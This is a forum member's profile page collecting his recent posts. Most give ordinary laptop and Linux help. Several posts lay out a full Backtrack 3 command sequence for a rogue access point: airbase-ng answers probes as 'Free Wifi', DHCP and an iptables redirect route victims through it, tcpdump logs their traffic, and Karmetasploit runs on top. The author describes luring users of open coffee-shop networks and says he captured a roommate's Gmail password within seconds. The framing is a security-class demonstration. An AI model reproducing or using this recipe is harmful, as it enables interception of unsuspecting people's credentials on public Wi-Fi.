Jump to content

kelsar56

Active Members
  • Posts

    29
  • Joined

  • Last visited

About kelsar56

  • Birthday 06/30/1988

Profile Information

  • Gender
    Male

Recent Profile Visitors

2,719 profile views

kelsar56's Achievements

Newbie

Newbie (1/14)

  1. That is an interesting problem. What do you mean when you say "there was a lot op shit on it"? One suggestion I would make as a first try type thing is getting a can of air duster and see if the fan is just super dirty and needs cleaned. Have you ever opened your mbp before and would it void anything?
  2. what kind of a budget? how good of a gaming laptop do you want? Like just wow or what? Link the ones you narrowed down, please. :) thanks
  3. are you having trouble getting an internet connection or is there a problem with firefox? and if so are you having trouble with a wired or wireless connection? Also what where you using before linux and if it was windows did it connect fine? I would suggest using ubuntu because it is user friendly and if you dont know linux commands it can help you if you need to fallback on the GUI. You can try and open a command prompt and do ifconfig that is the linux equivalent of ipconfig in windows
  4. okay I solved the problem I was having here if you look at post number 5 do everything that I did and it works. Trouble was that I was testing it on networks that required WEP keys. So if there is an open network around like a coffee shop network and the SSID is named "Coffee Shop" and you follow the commands I have above then it will make a network called "Free Wifi" then anyone who tries to connect to the open "Coffee Shop" network will be redirected to you and metasploit will look for information on them from there. By having my roommate test some of this for me I got his gmail username and password within a matter of seconds. If you have any questions on this feel free to message me or add to this post.
  5. thanks again digi you are very helpful
  6. Does anyone have any else have any ideas of cool wireless hacks I could use? I am just going present them in my security class. Looking for something dealing with karma or something else related to it.
  7. Alright well thank you for looking into it anyway I appreciate it.
  8. Umm.. I have been trying something different not to completely ignore your advice digininja I know you know a lot more about this than me, but would it be possible to do something like this. by starting off I open a command prompt in bt3 and do the following on a clean install of BT3 on my usb ifconfig wlan0 up // turn on the wireless card modprobe -r iwl3945 // get rid of the iwl3945 driver modprobe ipwraw // add this driver to allow me to monitor and sort of inject packets airmon-ng start wifi0 // start monitoring packets aireplay-ng --test wifi0 // test the packet injection this creates the issues with only one packet being injected total svn co http://trac.aircrack-ng.org/svn/trunk aircrack-ng // I update aircrack-ng because bt3 doesn't have the latest version cd aircrack-ng make make install sudo airodump-ng-oui-update modprobe tun // I run this because for some reason without it I can't pose as an access point airbase-ng -P -C 30 -e "Free Wifi" -v wifi0 // I pose as an AP with this command -P to respond to probes -C to wait 30 seconds before changing ssid's -e to create a starting ssid -v to report more and wifi0 is the interface I wanted to use I then open up a different command prompt and do the following what that is running ifconfig at0 up 10.0.0.1 netmask 255.255.255.0 // I set up at0 with the network info dhcpd -cf /etc/dhcpd.conf at0 // I start up the DHCP server with the config that it comes with iptables -t nat -A PREROUTING -i at0 -j REDIRECT // This is a command overcomes cached DNS issues tcpdump -i at0 > /root/tcptraffic // This tracks packets on the AP then I update metasploit 3 by doing the following cd /pentesting/exploits/framework3 rm -r data svn update // I do this to update metasploit 3 I then try to get karma going in msfc from the start menu and once it is up I do msfconsole -r karma.rc // This starts karma up in metasploit From this point it sort of works sort of doesn't because I dont completely know what all I'm doing I try to connect My pda to my wireless router it connects fine. One time my roommate was on his computer and tried to connect to the Free Wifi SSID and it connected. He tried to go to google and something came up saying hotel connection loading, but it never went farther than that. Like I said before I am stuck with my limited equipment. If karma doesn't work with intel chips then what could you suggest me to do with airbase-ng I am unsure of how to use it for the most part? Anyone have any suggestions on what I might need to do to get users to connect to my AP or does anyone know some linux commands in BT3 that might come in handy when working with this type of thing? Also any idea about the single packet injection? here is the site i got most of my info from http://www.metasploit.com/redmine/projects...i/Karmetasploit there are others, but this was the main one
  9. Alright so recently I have been playing around with karma on backtrack 3. I know that this is suppose to be about Jasager, but I don't own a fon router and because college costs so much these days I don't have more than $20 in the bank. So I have been trying to get karma working on BT3. The problem that I run into is that my IntelĀ® PRO/Wireless 3945ABG Network Card has trouble injecting packets onto wireless networks. I have looked around a bit and people on other forums say to get around the packet injection problem if you do a (excuse my code if it is wrong I can't get to it atm) "modprobe -r iwl3945" after that then run "modprobe ipwraw" I have tried this and it works to some degree. For the most part I start off by running "iwconfig" to see if wifi0 is there then turn it on with "ifconfig wifi0 up" then I try "airmon-ng start wifi0" this seems to work it tells me that the card is in monitor mode. Where I run into trouble is when I try to do "aireplay-ng --test wifi0" to do the packet injection. When if first runs it injects a single packet then after that will not inject anything. For some reason it seems to be very glitchy. I have learned everything I know about linux from online sources mainly and I am by no means a pro, so I could be doing something wrong here. The weird thing is the single packet injection because after this point if I browse to the karma folder then do "(cd ./src/ && make) && ./src/karma wifi0" it picks up probes and seems to work, but if I run one of the scripts if screws up when it starts the dns. Any suggestions? btw if you would like more info or any outputs just let me know what you need
×
×
  • Create New...